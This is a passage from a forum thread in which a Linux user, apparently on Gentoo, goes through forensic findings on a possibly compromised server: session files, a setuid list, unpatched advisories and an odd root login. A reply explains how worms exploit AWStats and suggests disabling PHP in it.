-rw-------  1 apache apache    7 sep 27 23:08 /tmp/sess_e0e884fe36e1ddc25852ccb354f6b9ea

-rw-------  1 apache apache 2,0K sep 15 19:15 /tmp/sess_e4c5c058f61fcfb41cf48735a73a7f6d

-rw-------  1 apache apache    7 sep 29 13:27 /tmp/sess_f742e0a34a022894388793c5bdbda19c

-rw-------  1 apache apache    7 oct  1 17:30 /tmp/sess_fd3587d62383ae5badfcad12c70ca359

```

SOME INBOX

```

cat /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402

sq_base_url|s:27:"http://webmail.MY_APACHE_SERVER.COM";base_uri|s:1:"/";onetimepad|s:12:

"AhobV7wnT9o=";sqimap_capabilities|a:12:{s:9:"IMAP4rev1";b:1;s:7:"UIDPLUS";b:1;s:8:"CHILDREN";b:1;s:9:"NAMESPACE";b:1;s:6: \

"THREAD";s:10:

"REFERENCES";s:4:

"SORT";b:1;s:5:"QUOTA";b:1;s:4:"IDLE";b:1;s:4:"AUTH";s:5:"PLAIN";s:3:"ACL";b:1;s:4:"ACL2"; \

s:5:"UNION";s:14:

"XCOURIEROUTBOX";

s:14:"INBOX.Outbox

";}delimiter|s:1:".";username|s:5:"pbx06";user_is_logged_in|b:1;just_logged_in|b:0;

attachment_common_types|a:6:{s:9:"text/html";b:1;s:10:"image/jpeg";b:1;s:9:"image/png";b:1;s:6:"text/*";b:1;s:7: \

"image/*";b:1;s:3:"*/*";b:1;}

attachment_common_types_parsed|a:0:{}prefs_cache|a:7:{s:17:"show_html_default";s:1:"0";s:4:"sort"; \

s:1:"0";s:13:"javascript_on";s:1:"1";s:8:"hililist";s:6:

"a:0:{}";s:12:"chosen_theme";s:24:"../themes/dark_green.php";s:10:"custom_css";s:14:"verdana-10.css"

;s:8:"show_num";s:2:"30";}

prefs_are_cached|b:1;theme_css|s:0:"";boxesnew|a:30:{i:0;a:7:

{s:3:"raw";s:45:"* LIST (\Unmarked \HasChildren) "." "INBOX"

";s:9:"formatted";s:5:"INBOX";s:14:"unformatted-dm";s:5:"INBOX";s:11:"unformatted";s:5:

"INBOX";s:16:"unformatted-disp";s:5:

"INBOX";s:2:"id";i:0;s:5:"flags";a:2:{i:0;s:8:"unmarked";i:1;s:11:"haschildren";}}i:1;a:7:

{s:3:"raw";s:44:"* LIST (\HasNoChildren) "." "INBOX.Drafts"

";s:9:"formatted";s:18:"&nbsp;&nbsp;Drafts";s:14:"unformatted-dm";s:12:"INBOX.Drafts";s:11:"unformatted";s:12:

"INBOX.Drafts";s:16:"unformatted-disp";s:12:"INBOX.Drafts";s:2:"id";i:5;s:5:

"flags";a:1:{i:0;s:13:"hasnochildren";}}i:2;a:7:

{s:3:"raw";s:42:"* LIST (\HasNoChildren) "." "INBOX.Sent"

";s:9:"formatted";s:16:"&nbsp;&nbsp;Sent";s:14:"unformatted-dm";s:10:"INBOX.Sent";s:11:"unformatted";s:10:

"INBOX.Sent";s:16:"unformatted-disp";s:10:"INBOX.Sent";s:2:"id";i:19;s:5:"flags";a:1:

{i:0;s:13:"hasnochildren";}}i:3;a:7:{s:3:"raw";s:43:"* LIST (\HasNoChildren) "." "INBOX.Trash"

";s:9:"formatted";s:17:"&nbsp;&nbsp;Trash";s:14:"unformatted-dm";s:11:"INBOX.Trash";s:11:"unformatted";s:11:

"INBOX.Trash";s:16:"unformatted-disp";s:11:"INBOX.Trash";s:2:"id";i:26;s:5:"flags";a:1:

{i:0;s:13:"hasnochildren";}}i:4;a:7:{s:3:"raw";s:51:"* LIST (\HasNoChildren) "." "INBOX.nature

.

.

.

SOME sensitive info like senders mail adress to be used as spam mailing

.

.

.

```

the above look like squirelmail webmail frontEND but it cant be !

```

cat /tmp/sess_0569b807f3b1ee0f443ac4f703090435

DATA|a:4:{i:2;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:11

;i:0;i:12;i:12;i:13;i:16;

i:14;i:11;i:15;i:15;i:16;i:26;i:

17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;i:

28;i:18;i:29;i:19;i:30;i:22;i:31;i:

16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:

15;i:43;i:33;}i:1;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:

11;i:0;i:12;i:12;i:13;i:16;

i:14;i:11;i:15;i:15;i:16;i:26;

i:17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;

i:28;i:18;i:29;i:19;i:30;i:22;i:31;i:

16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:

15;i:43;i:33;}i:0;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i

:11;i:0;i:12;i:28;i:13;i

:22;i:14;i:42;i:15;i:37;i:16;i:235;

i:17;i:30;i:18;i:68;i:19;i:72;i:20;i:68;i:21;i:74;i:22;i:43;i:23;i:46;i:24;i:24;i:25;i:37;i:26;i:37;i:27;i:28;

i:28;i:31;i:29;i:27;i:30;i:37;i:31;

i:44;i:32;i:38;i:33;i:29;i:34;i:83;i:35;i:24;i:36;i:56;i:37;i:71;i:38;i:27;i:39;i:31;i:40;i:45;i:41;i:31;i:42

;i:34;i:43;i:81;}s:1:"x";a:44:{i:0;s:5:"11.08";i:1;s:5:"12.08";i:2;s:5:"13.08";i:3;s:5:"14.08";i:4;s:5:"15.08";i:5;s:5:"16.08";i:6;s:5:

"17.08";i:7;s:5:"18.08";i:8;s:5:

"19.08";i:9;s:5:"20.08";i:10;s:5:"21.08";i:11;s:5:"22.08";i:12;s:5:"23.08";i:13;s:5:"24.08";i:14;s:5:"25

.08";i:15;s:5:"26.08";i:16;s:5:

"27.08";i:17;s:5:"28.08";i:18;s:5:"29.08";i:19;s:5:"30.08";i:20;s:5:"31.08";i:21;s:5:"01.09";i:22;s:5:"02.09";i:

23;s:5:"03.09";i:24;s:5:

"04.09";i:25;s:5:"05.09";i:26;s:5:"06.09";i:27;s:5:"07.09";i:28;s:5:"08.09";i:29;s:5:"09.09";i:30;s:5:"10.09";i

:31;s:5:"11.09";i:32;s:5:

"12.09";i:33;s:5:"13.09";i:34;s:5:"14.09";i:35;s:5:"15.09";i:36;s:5:"16.09";i:37;s:5:"17.09";i:38;s:5:"18.09";i:

39;s:5:"19.09";i:40;s:5:

"20.09";i:41;s:5:"21.09";i:42;s:5:"22.09";i:43;s:5:"23.09";}}

```

MD5SUM

i have over 1000 files that didnt match portage !md5! 

```

qpkg -v -v -c|grep "!md5!"|wc) including gcc/glibc,netstat,ping & a couple of /usr/linux/ c code.

```

checkrootkit found 0 rootkit

but it terible old/outdated & LAME & static

SETUID/GUID files

found somme suspisous KDE SETUID file:

```

-rws--x--x  1 root 30420 aoû 23 05:47 /bin/su

-rwsr-x--x  1 root 31056 oct 28  2004 /bin/ping

-rws--x--x  1 root 71684 fév  3  2005 /bin/mount

-rws--x--x  1 root 24752 oct 28  2004 /bin/ping6

-rws--x--x  1 root 32296 aoû 23 05:47 /bin/passwd

-rws--x--x  1 root 39848 fév  3  2005 /bin/umount

-rwxr-sr-x  1 zendtech 237732 oct  1 16:59 /opt/Zend/sbin/ini_modifier

-r-s--x--x  1 root 12608 aoû 27 23:36 /opt/vmware/bin/vmware-ping

-r-sr-xr-x  1 root 4714 aoû 27 23:36 /opt/vmware/bin/vmware

-rws--x--x  1 root 3636940 aoû 27 23:36 /opt/vmware/lib/bin/vmware-vmx

-rws--x--x  1 root 756668 jun 16 18:20 /usr/bin/gpg

-rws--x--x  1 root 49988 jui  5 03:43 /usr/bin/ksu

-r-xr-s--x  1 man 50796 sep 28 14:19 /usr/bin/man

-rws--x--x  1 root 2171160 oct  3 21:52 /usr/bin/Xorg

-rws--x--x  1 root 35524 aoû 23 05:47 /usr/bin/chfn

-rws--x--x  1 root 31520 aoû 23 05:47 /usr/bin/chsh

---s--x--x  1 root 93084 fév 11  2005 /usr/bin/sudo

-rws--x--x  1 lp 11904 mar 20  2005 /usr/bin/lppasswd

-rws--x---  1 cron 33644 mai 16 07:00 /usr/bin/crontab

-rws--x--x  1 root 41104 aoû 23 05:47 /usr/bin/chage

-rwsr-xr-x  1 root 17132 jan 30  2005 /usr/bin/eject #(setuid by me to eject USB media device easier)

-rwxr-s--x  1 tty 10652 fév  3  2005 /usr/bin/write

-rwxr-s--x  1 mail 9564 jun 11 16:36 /usr/bin/dotlock

-rwx--s--x  1 slocate 32904 fév 19  2005 /usr/bin/slocate

-rws--x--x  1 root 220424 fév 14  2005 /usr/bin/xscreensaver

---s--x--x  1 root 18876 fév 13  2005 /usr/bin/mount.cifs

-rws--x--x  1 root 24540 aoû 23 05:47 /usr/bin/expiry

-rws--x--x  1 root 26140 aoû 23 05:47 /usr/bin/newgrp

-rws--x--x  1 root 43648 aoû 23 05:47 /usr/bin/gpasswd

-rwxr-s--x  1 utmp 301020 fév 11  2005 /usr/bin/screen

---s--x--x  1 root 11280 fév 13  2005 /usr/bin/smbmnt

---s--x--x  1 root 9012 fév 13  2005 /usr/bin/smbumount

-rwxr-s--x  1 root 16000 jun 12 17:30 /usr/bin/lockfile

-rwxr-s--x  1 mail 38796 jun 14 18:23 /usr/bin/mutt_dotlock

-rws--s--x  1 root 78240 jun 12 17:30 /usr/bin/procmail

-rws--x--x  1 root 692688 mar 19  2005 /usr/kde/3.3/bin/kppp

-rws--s--x  1 root 61028 mar 19  2005 /usr/kde/3.3/bin/reslisa

-rws--x--x  1 root 702788 aoû 25 00:01 /usr/kde/3.4/bin/kppp

-rws--x--x  1 root 61148 aoû 25 00:01 /usr/kde/3.4/bin/reslisa

-rws--x--x  1 root 10997 jun 22 00:28 /usr/kde/3.4/bin/fileshareset

-rws--x--x  1 root 7692 jun 22 00:28 /usr/kde/3.4/bin/kgrantpty

-rws--x--x  1 root 6920 sep 10 10:43 /usr/kde/3.4/bin/artswrapper

-rwxr-s--x  1 nogroup 76468 jun 22 02:29 /usr/kde/3.4/bin/kdesud

-rws--x--x  1 root 14192 jun 22 02:29 /usr/kde/3.4/bin/kcheckpass

-rws--x--x  1 root 8036 jun 22 00:28 /usr/kde/3.4/bin/kpac_dhcp_helper

-rws--x--x  1 root 11788 aoû 23 07:25 /usr/lib/misc/glibc/pt_chown

-rws--x--x  1 root 152896 avr  4  2005 /usr/lib/misc/ssh-keysign

-rws--x---  1 squid 17452 mai 16 09:38 /usr/lib/squid/pam_auth

-rws--x---  1 squid 17796 mai 16 09:38 /usr/lib/squid/ncsa_auth

-r-s--x--x  1 root 18264 aoû 23 05:41 /usr/sbin/unix_chkpwd

-rwsr-xr-x  1 root 28512 fév 11  2005 /usr/sbin/fping

-rws--x---  1 wheel 20620 jun 25 20:33 /usr/sbin/traceroute

-rwxr-sr-x  1 postdrop 106348 jun 12 17:57 /usr/sbin/postdrop

-rws--x---  1 apache 13448 sep 25 08:43 /usr/sbin/suexec2

-rwxr-sr-x  1 postdrop 128244 jun 12 17:57 /usr/sbin/postqueue

-rws--x--x  1 root 11932 fév  1  2005 /usr/sbin/gnome-pty-helper

-rwxr-s--x  1 utmp 8312 mar 13  2005 /usr/sbin/utempter

-rwxr-s--x  1 mail 9476 jun 15 20:23 /usr/libexec/camel-lock-helper-1.2

-rws--x--x  1 mail 24104 jun 11 16:36 /usr/libexec/mail.local

-rwxr-s--x  1 utmp 9804 jan 31  2005 /usr/libexec/gnome-pty-helper

-rwsr-sr-t  1 users 0 jan  8  2005 /home/pbx06/.superkaramba/.lock

```

LISTENING ports

everythings seems OK excepting for 

dnsmaq witch is a light DNS server : witch is also listening on eth0/*:33493

glsa-check'ing the BOX

only the awstats seems to exploitable

```

glsa-check -l | grep '\[N\]'

WARNING: This tool is completely new and not very tested, so it should not be

used on production systems. It's mainly a test tool for the new GLSA release

and distribution system, it's functionality will later be merged into emerge

and equery.

Please read http://www.gentoo.org/proj/en/portage/glsa-integration.xml

before using this tool AND before reporting a bug.

[N] indicates that the system might be affected.

200509-01 [N] MPlayer: Heap overflow in ad_pcm.c ( media-video/mplayer )

200509-06 [N] Squid: Denial of Service vulnerabilities ( net-proxy/squid )

200509-08 [N] Python: Heap overflow in the included PCRE library ( dev-lang/python )

200509-10 [N] Mailutils: Format string vulnerability in imap4d ( net-mail/mailutils )

200509-13 [N] Clam AntiVirus: Multiple vulnerabilities ( app-antivirus/clamav )

200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )

200509-18 [N] Qt: Buffer overflow in the included zlib library ( x11-libs/qt )

200510-04 [N] Texinfo: Insecure temporary file creation ( sys-apps/texinfo )

200506-22 [N] sudo: Arbitrary command execution ( app-admin/sudo )

200506-23 [N] Clam AntiVirus: Denial of Service vulnerability ( app-antivirus/clamav )

200508-01 [N] Compress::Zlib: Buffer overflow ( dev-perl/Compress-Zlib )

200508-04 [N] Netpbm: Arbitrary code execution in pstopnm ( media-libs/netpbm )

200508-07 [N] AWStats: Arbitrary code execution using malicious Referrer information ( net-www/awstats )

200508-08 [N] Xpdf, Kpdf, GPdf: Denial of Service vulnerability ( kde-base/kdegraphics app-text/xpdf app-text/gpdf ... )

200508-17 [N] libpcre: Heap integer overflow ( dev-libs/libpcre )

200508-19 [N] lm_sensors: Insecure temporary file creation ( sys-apps/lm_sensors )

200507-04 [N] RealPlayer: Heap overflow vulnerability ( media-video/realplayer )

200507-10 [N] Ruby: Arbitrary command execution through XML-RPC ( dev-lang/ruby )

200507-11 [N] MIT Kerberos 5: Multiple vulnerabilities ( app-crypt/mit-krb5 )

200507-16 [N] dhcpcd: Denial of Service vulnerability ( net-misc/dhcpcd )

200507-17 [N] Mozilla Thunderbird: Multiple vulnerabilities ( mail-client/mozilla-thunderbird mail-client/mozilla-thunderbird-bin )

200507-21 [N] fetchmail: Buffer Overflow ( net-mail/fetchmail )

200507-22 [N] sandbox: Insecure temporary file handling ( sys-apps/sandbox )

200507-23 [N] Kopete: Vulnerability in included Gadu library ( kde-base/kdenetwork kde-base/kopete )

200507-25 [N] Clam AntiVirus: Integer overflows ( app-antivirus/clamav )

200507-27 [N] Ethereal: Multiple vulnerabilities ( net-analyzer/ethereal )

```

/var/log/wtmp

found one wired line : root loged from an unknow box:

```

last -a |grep root |less

root     pts/9        Sun Sep 18 14:15 - 21:03 (1+06:47)    noc.au.SOME-HOSTNAME.net

```

what a pain to dig trought all those log file : pop/smptd/httpd/ftpd/sshd  all have a diferent file format

ANY sugestions ?

mod edit: inserted linebreak \ for page formatting --Earthwings

----------

## linux_girl

 *newtonian wrote:*   

>  *kaidon wrote:*   If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
> 
> In this case you don't need to alter any partition tables.
> 
> Depending on what apps you're running it'll also be quite a speed up.
> ...

 

util-linux has a flow : an use re-mount a partion it lose the nosuid,noexec,...

200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )

----------

## Bob P

 *linux_girl wrote:*   

> 2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

 

i doubt that the bad guys even care to know whether or not you have an AWStats implementation running on your server when they attack it with a script exploit.  i think that they just apply a very simple brute strength approach rather than by applying knowledge specific to your system:  the bad guys just crawl the web pinging for responses Port 80.  their software pays attention when a site responds as yours did;  when they find a server on port 80 they apply the worm as an HTML request, indifferent to whether you have awstats running or not.  if you DO have AWstats running with PHP enabled, then they exploit your box.  if you don't then they don't, and they move along.  its pretty simple, really.  it amounts to nothing more complex than picking the low-hanging fruit.   :Idea: 

my HTTP server logs show that i'm hit by requests from those worms all the time.  they never get in, but the logs still show them trying.  maybe you should disable PHP in awstats, and generate your reports in a cron job instead.   :Idea: 

PS - could somebody fix the page formatting problem?

----------

